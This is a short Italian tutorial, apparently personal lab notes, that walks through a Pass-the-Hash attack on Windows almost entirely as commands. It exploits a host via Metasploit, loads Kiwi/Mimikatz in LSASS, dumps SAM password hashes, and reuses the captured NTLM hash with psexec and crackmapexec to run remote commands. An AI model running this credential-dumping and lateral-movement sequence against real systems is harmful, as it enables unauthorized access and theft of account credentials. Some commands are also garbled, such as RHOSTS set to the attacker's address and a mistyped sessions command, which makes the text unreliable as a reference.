Pass-The-Hash Attacks

Cybersecurity

Il Pass the Hash è una tecnica di attacco che consente di autenticarsi su sistemi remoti utilizzando direttamente l’hash NTLM della password, senza conoscerne il testo in chiaro. Sfrutta la gestione dell’autenticazione in Windows per muoversi lateralmente nella rete e ottenere accesso non autorizzato. E' possibile effettuare questo tipo di attacco con diversi tool:

Metsploit PsExec module

Crackmapexec

service postgresql start && msfconsole

search badblue

use 1

set RHOSTS target_ip

exploit

Una volta aperta la sessione di meterpreter

pgrep lsass

migrate ID_PROCESS

getuid load kiwi

lsa_dump_sam ? estrae gli hash delle password memorizzati nel SAM (Security Account Manager) di Windows leggendo direttamente il database locale. Questi hash possono poi essere usati in attacchi come pass the hash.

Kiwi ? è l’implementazione di Mimikatz integrata in Metasploit. Permette di dumpare credenziali in chiaro, hash NTLM, ticket Kerberos e molto altro, agendo direttamente nella memoria del processo LSASS.

hashdump

background//mettiamo la sessione in background

search psexec

use exploit/windows/smb/psexec

set LPORT 4422 //scegliamo una porta differente da quella della sessione aperte precedentemente

set RHOSTS ip_attaccante

set SMBUser Administrator

set SMBPass “hash catturato in precedenza”

set target Native\ upload

exploit

la sessione precedente posso anche terminarla non’è piu necessaria

session -K

L’exploit funzionerà lo stesso[windows/smb/psexec]

Testiamo crackmapexec

crackmapexec smb -u Administratror -H “hash da incollare” -x “ipconfig”

crackmapexec smb -u Administratror -H “hash da incollare” -x “net user Administrator”